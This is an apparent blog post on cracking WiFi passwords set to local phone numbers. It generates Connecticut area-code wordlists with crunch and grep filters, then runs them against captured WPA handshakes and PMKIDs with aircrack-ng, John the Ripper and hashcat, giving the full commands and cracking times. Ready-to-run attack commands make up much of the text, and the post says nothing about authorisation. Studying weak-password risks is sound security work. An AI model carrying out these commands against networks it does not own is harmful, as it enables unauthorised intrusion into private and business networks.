Cracking WiFi – phone number wordlist

I used to see alot of networks setup and either the tech or the end user choosing the person/business’s phone number as the password. So I usually try to test these first when trying to crack a WiFi password.

I was looking into more efficient ways to crack the password if you were working in a virtual machine and didn’t have access to a GPU cracking rig to utilize hashcat. You could pipe crunch to aircrack-ng on the fly and reduce some keyspace by prepending the area code :
crunch 10 10 -t 860%%%%%%% | aircrack-ng /root/handshake.cap -e MyESSID -w-
This results in testing 10 million different numbers.But you can reduce that keyspace and avoid unnecessary CPU time by pre-generating a wordlist with all the numbers and then removing the exchange prefixes that aren’t in use.

NANP (North American Numbering Plan) numbers are ten digits in length, and they are in the format: NXX-NXX-XXXX Where N is any digit 2-9 and X is any digit 0-9.
So removing any prefix that starts with 1 or 0 and and any service prefix N11 (i.e. 411,911 etc..) can be removed too, reducing this keyspace. Checking online databases of exchange listings for each state will you to allow the keyspace even further by removing unused/reserved.
Also, as of September 2016, all 555 numbers have been returned to the NANPA inventory except 555-1212 (national use directory assistance) and 555-4334 (national use assigned.) The fictitious, non-working numbers, 555-0100 through 555-0199, will remain reserved for entertainment/advertising.
So we will keep that in mind that we can remove another 102 entries per area code with the regex:
^86055501[0-9][0-9]|^8605551212|^8605554334
Connecticut doesn’t use the 555 prefix currently though so were going to just remove all of the 555 prefix, so by using crunch again and some regex grep’ing:

crunch 10 10 -t 860%%%%%%%>860.txt
cat 860.txt | grep -vP "^860[0,1]|^860[2,3,4,5,6,7,8,9]11\ |^860[2,3,5,6,7,9]00|^86093[1,4,6,7]|^86095[0,8,9]|^860555\
|^86096[0,9]|^860976|^86098[0,1]|^86099[4,6]|">860numbers.txt
This knocks the results down to:
wc -l 860.txt 860numbers.txt
10000000 860.txt
7710000 860numbers.txt
reduced keyspace = 2,290,000

Now you’re thinking , shit there’s usually more than 1 area code per state. So for Connecticut there is 203, 860, 475, and 959. 959 doesnt have any exchanges yet afaik, 475 exchanges are relatively small currently, and 203 actually has more exchanges in use than 860. So we just do the same thing for 203:

crunch 10 10 -t 203%%%%%%%>203.txt
cat 203.txt | grep -vP "^203[0,1]|^203[2,3,4,5,6,7,8,9]11\
|^203[2,3,5,6,7,9]00|^203203|^203475|^203555|^203700\
|^203860|^20395[0,8,9]|^203976|^203999">203numbers.txt

This knocks the results down to:
10000000 203phonenumber.txt
7770000 203.txt
reduced keyspace 2,230,000

After doing this for each area code, you can cat the files together to create a wordlist that you can pipe to aircrack-ng or john the ripper. If you’re a lazy reader from Connecticut, I am attaching the compiled wordlist ::allctphonenumbers.zip (16.7mb):: of all 860/203/475 area codes (15,760,000 total).

It shouldn’t take a relatively long time to test against a captured handshake to see if they used phone number for the password. Using the 203 area code wordlist it took about 12 minutes, because it basically starts at the beginning phone number (i.e. 2032000000)
aircrack-ng -w /root/ctphonenumbers203.txt /root/handshake.cap -e MyESSID

Or you can use John the Ripper, first convert the cap file using:
hcxhash2cap --pmkid=test.16800 -c handshake.cap
then
john -w:allctnumbers.txt --format=wpapsk --pot=pmkid.cracked.pot test.16800

took about an hour on a vm to run through both area codes and crack it


If you are lucky to be able to use hashcat, the remaining number goes pretty quick with a good GPU, but also you can help to reduce the keyspace using charsets. Which the charset going through 7 digits took about 1 second to crack.

PMKID
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d -w 4 --force -O
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 860?1?d?d?d?d?d?d -w 4 --force -O

WPA/WPA2
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 860?2?1?1?1?1?1?1 -w 4 --force -O
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 203?2?1?1?1?1?1?1 -w 4 --force -O

Yes, cracking WPA-PMKID with a wordlist can be slow
with the 203 wordlist it took 53 seconds to crack
bruteforcing PMKID with a charset mask with GPU took one second 🙂
hashcat -m 16800 pkid.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d –force

So wordlists aren’t that great but if you’re stuck on a sub par PC and need something in a pinch its worth it to try before you try using larger wordlists etc. I’m writing this just for notes at 6 am, and suck at math, so let me know if I have any mistakes in the calculations etc.. in the comments. Will be doing a follow up article on how to capture PMKID’s on vulnerable targets.
Happy cracking.